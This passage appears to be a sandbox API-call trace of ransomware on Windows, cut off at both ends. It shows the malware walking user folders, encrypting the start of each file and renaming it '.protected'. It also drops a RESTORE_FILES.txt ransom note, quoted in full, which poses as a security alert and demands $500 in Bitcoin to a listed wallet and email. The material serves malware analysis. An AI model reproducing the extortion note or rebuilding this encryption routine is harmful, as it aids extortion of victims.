lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.073] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.073] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0093.073] CloseHandle (hObject=0xd8) returned 1 [0093.073] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.073] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.074] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\RESTORE_FILES.txt") returned 74 [0093.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\wljq\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\wljq\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0093.076] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.076] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0093.077] lstrlenA (lpString="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") returned 684 [0093.077] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0093.077] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.077] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0093.077] CloseHandle (hObject=0xd4) returned 1 [0093.077] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.077] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.077] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\RESTORE_FILES.txt") returned 69 [0093.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ngZxA0y_ZD\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ngzxa0y_zd\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0093.078] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.078] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0093.079] lstrlenA (lpString="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") returned 684 [0093.079] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0093.079] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.079] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0093.079] CloseHandle (hObject=0xb4) returned 1 [0093.081] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="Windows") returned -1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="Program Files") returned 1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="Program Files (x86)") returned 1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="$Recycle.bin") returned 1 [0093.081] lstrcmpiW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="System Volume Information") returned -1 [0093.081] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv") returned 62 [0093.081] StrStrIW (lpFirst="RgIELSgrJA-wX Ryy.flv", lpSrch=".protected") returned 0x0 [0093.082] lstrcmpW (lpString1="RgIELSgrJA-wX Ryy.flv", lpString2="RESTORE_FILES.txt") returned 1 [0093.082] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.082] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rgielsgrja-wx ryy.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0093.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv") returned 62 [0093.082] StrStrW (lpFirst="RgIELSgrJA-wX Ryy.flv", lpSrch=".txt") returned 0x0 [0093.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX 
Ryy.flv") returned 62 [0093.082] StrStrW (lpFirst="RgIELSgrJA-wX Ryy.flv", lpSrch=".rar") returned 0x0 [0093.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv") returned 62 [0093.082] StrStrW (lpFirst="RgIELSgrJA-wX Ryy.flv", lpSrch=".zip") returned 0x0 [0093.082] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0093.083] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.083] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0093.083] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.083] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0093.083] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0093.083] CloseHandle (hObject=0xb4) returned 1 [0093.084] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv.protected") returned 72 [0093.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rgielsgrja-wx ryy.flv"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RgIELSgrJA-wX Ryy.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\rgielsgrja-wx ryy.flv.protected")) returned 1 [0093.085] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="Windows") returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="Program Files") returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="Program Files (x86)") returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="$Recycle.bin") returned 1 [0093.085] lstrcmpiW (lpString1="Xf1q0UG.flv", lpString2="System Volume Information") returned 1 [0093.085] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv") returned 52 [0093.085] StrStrIW (lpFirst="Xf1q0UG.flv", lpSrch=".protected") returned 0x0 [0093.085] lstrcmpW (lpString1="Xf1q0UG.flv", lpString2="RESTORE_FILES.txt") returned 1 [0093.085] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.085] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xf1q0ug.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0093.085] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv") returned 52 [0093.085] StrStrW (lpFirst="Xf1q0UG.flv", lpSrch=".txt") returned 0x0 [0093.085] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv") 
returned 52 [0093.085] StrStrW (lpFirst="Xf1q0UG.flv", lpSrch=".rar") returned 0x0 [0093.085] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv") returned 52 [0093.085] StrStrW (lpFirst="Xf1q0UG.flv", lpSrch=".zip") returned 0x0 [0093.086] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0093.086] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.086] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0093.087] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.087] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0093.087] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0093.087] CloseHandle (hObject=0xb4) returned 1 [0093.087] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv.protected") returned 62 [0093.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xf1q0ug.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Xf1q0UG.flv.protected" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xf1q0ug.flv.protected")) returned 1 [0093.088] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.088] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.088] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RESTORE_FILES.txt") returned 58 [0093.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0093.089] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.089] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0093.089] lstrlenA (lpString="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") returned 684 [0093.089] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0093.089] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.089] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0093.090] CloseHandle (hObject=0xa4) returned 1 [0093.090] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0093.090] FindClose (in: hFindFile=0x47b950 | out: hFindFile=0x47b950) returned 1 [0093.090] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\RESTORE_FILES.txt") returned 51 [0093.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0093.091] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.091] WriteFile (in: hFile=0x104, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0093.092] lstrlenA (lpString="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") returned 684 [0093.092] WriteFile (in: hFile=0x104, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.092] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.092] WriteFile (in: hFile=0x104, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0093.092] CloseHandle (hObject=0x104) returned 1 [0093.092] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="Windows") returned -1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="Program Files") returned -1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="Program Files (x86)") returned -1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="$Recycle.bin") returned 1 [0093.092] lstrcmpiW (lpString1="All Users", lpString2="System Volume Information") returned -1 [0093.092] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users") returned 22 [0093.092] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0093.092] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0093.092] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\*") returned 24 [0093.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x47b950 [0093.092] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.092] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.092] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.092] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.092] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.092] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\.") returned 24 [0093.092] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.092] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.092] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.092] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0093.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0093.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\." (normalized: "c:\\users\\all users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.093] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.093] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.093] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.093] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.093] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.093] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.093] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\..") returned 25 [0093.093] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.093] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.093] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.093] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0093.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0093.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\.." 
(normalized: "c:\\users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.093] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0093.093] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0093.093] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe") returned 28 [0093.093] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0093.093] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0093.093] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\*") returned 30 [0093.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 